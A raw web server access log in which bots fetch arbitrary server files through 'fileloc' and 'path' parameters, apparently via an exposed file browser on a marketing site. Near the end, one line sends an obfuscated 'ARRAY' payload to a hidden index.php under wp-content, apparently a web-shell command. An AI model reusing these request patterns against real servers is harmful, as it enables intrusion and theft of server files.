216.73.216.50 - - [09/Nov/2025:01:11:58 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2-0.14.0.egg-info%2Fdependency_links.txt&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2-0.14.0.egg-info HTTP/1.0" 200 2909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:11:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/node0/hugepages HTTP/1.0" 200 3264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.205.74.196 - - [09/Nov/2025:01:11:58 +0000] "GET /our-works/tvc-sjc/?path=//sys/devices/isa HTTP/1.0" 200 3231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:11:59 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FDefinition%2FIntegerNode.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FDefinition HTTP/1.0" 200 3468 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:11:59 +0000] "GET /q-~160MuefOguELjV5wavDYacKBJmhxc1lOB28083/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:11:59 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FLoader%2FLoaderResolver.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FLoader HTTP/1.0" 200 3526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:00 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Ftest_loopback.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 6104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:01 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fcsky%2Finclude%2Fasm%2Felf.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fcsky%2Finclude%2Fasm HTTP/1.0" 200 4211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/node0/subsystem HTTP/1.0" 200 3415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:01 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Flinecache.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 4548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.205.113.104 - - [09/Nov/2025:01:12:01 +0000] "GET /our-works/tvc-kimino/?path=//sys/block/loop0/queue HTTP/1.0" 200 4286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:12:01 +0000] "GET /q-~197H0MpUa3dSgXysoMecAXbeyvOzBCJGT31912/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:02 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnios2%2Finclude%2Fuapi%2Fasm HTTP/1.0" 200 3511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:02 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fplatform_data%2Fgpio HTTP/1.0" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:02 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents%2Fskb.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:02 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsimplejson%2Ftool.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsimplejson HTTP/1.0" 200 3370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory14/node0/hugepages HTTP/1.0" 200 3263 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:03 +0000] "GET /q-~152NZxWzCynYodMzebGk1wq9vqcO7kigY3743/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Ftest_process.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 22067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:04 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fqed%2Feth_common.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fqed HTTP/1.0" 200 6844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Flib2to3%2Ffixes%2Ffix_nonzero.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Flib2to3%2Ffixes HTTP/1.0" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:04 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm%2Fswitch_to.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm HTTP/1.0" 200 3804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.205.163.103 - - [09/Nov/2025:01:12:05 +0000] "GET /our-works/tvc-sjc/?path=//usr/lib/modules-load.d HTTP/1.0" 200 3169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:12:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/node0/subsystem HTTP/1.0" 200 3415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:05 +0000] "GET /q-~178pwqNqpIcE7Ukla5nZOFriVYmJCNdCv32843/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:05 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fdrm%2FdrmP.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fdrm HTTP/1.0" 200 4223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FEncode%2Fencode.h&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FEncode HTTP/1.0" 200 14309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:06 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fcryptography%2Fhazmat%2Fbackends%2Fopenssl%2Fed25519.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fcryptography%2Fhazmat%2Fbackends%2Fopenssl HTTP/1.0" 200 4013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:07 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents%2Fkyber.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 3603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory14/subsystem/drivers HTTP/1.0" 200 2954 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:07 +0000] "GET /q-~45p3oRZTE5nAEkubXmiNpSprfI7qJFLv48412/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:07 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents%2Fib_umad.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 4015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:08 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fsh%2Finclude%2Fasm%2Fsfp-machine.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fsh%2Finclude%2Fasm HTTP/1.0" 200 3866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Ftest_stdio.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 6779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsecretstorage%2Fitem.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsecretstorage HTTP/1.0" 200 4549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory14/node0/hugepages HTTP/1.0" 200 3264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:08 +0000] "GET /q-~65AJkfhDCompTPDsEGQz1s6pw1XTPeto38890/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fservice_identity%2Fpyopenssl.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fservice_identity HTTP/1.0" 200 4575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fio.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.21.119.232 - - [09/Nov/2025:01:12:09 +0000] "GET /our-works/tvc-bia-hello/?path=//var/lib/systemd/deb-systemd-user-helper-enabled HTTP/1.0" 200 3488 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils%2Fcommand%2Finstall_egg_info.py&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils%2Fcommand HTTP/1.0" 200 4086 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:10 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio%2Funix_events.py&path=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.8%2Fasyncio HTTP/1.0" 200 13460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:10 +0000] "GET /q-~170U8VyDkZnfPwNbCvQI9rAeWjc1qMPnF7095/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:12:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0 HTTP/1.0" 200 4142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Ftraceback.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 9279 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail%2Fcharset.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail HTTP/1.0" 200 7963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:11 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fnds32%2Finclude%2Fasm%2Fmodule.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3056 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:12 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fnacl%2Futils.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fnacl HTTP/1.0" 200 3672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:12 +0000] "GET /q-~147joznCA5NtkqKaHbubBiHcR2mymUlox49652/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:12:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0 HTTP/1.0" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fasyncore.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 8831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.44.148.203 - - [09/Nov/2025:01:12:13 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/module/virtio_net/holders HTTP/1.0" 200 2898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail%2Fheaderregistry.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail HTTP/1.0" 200 8343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:14 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents%2Fclk.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 3656 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fzipapp.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 5519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:16 +0000] "GET /q-~23VNiPfVhX1vkmK5GgHilWdnrN8mwmFF48166/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fsimplexml%2Fphp_simplexml_exports.h&path=%2F%2Fopt%2Ffphp%2Finclude%2Fphp%2Fext%2Fsimplexml HTTP/1.0" 200 3789 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0 HTTP/1.0" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:17 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Ftest_postfix.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 4002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:17 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fpci%2Fendpoint%2Ffunctions%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fpci%2Fendpoint%2Ffunctions HTTP/1.0" 200 2986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmailbox.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 500 185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:18 +0000] "GET /q-~255zSa2r6eXoZCPfJtNWhSLpJHmjvbFcR28608/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:18 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fimportlib_metadata%2F_compat.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fimportlib_metadata HTTP/1.0" 200 4280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.212.205.90 - - [09/Nov/2025:01:12:19 +0000] "GET /our-works/intracom-riverside/?path=//run/systemd/shutdown HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:01:09:58 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343139382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303539382q6261396236363634393735346461626334643365326531326137363966366665222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:01:12:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory14/node0/subsystem HTTP/1.0" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
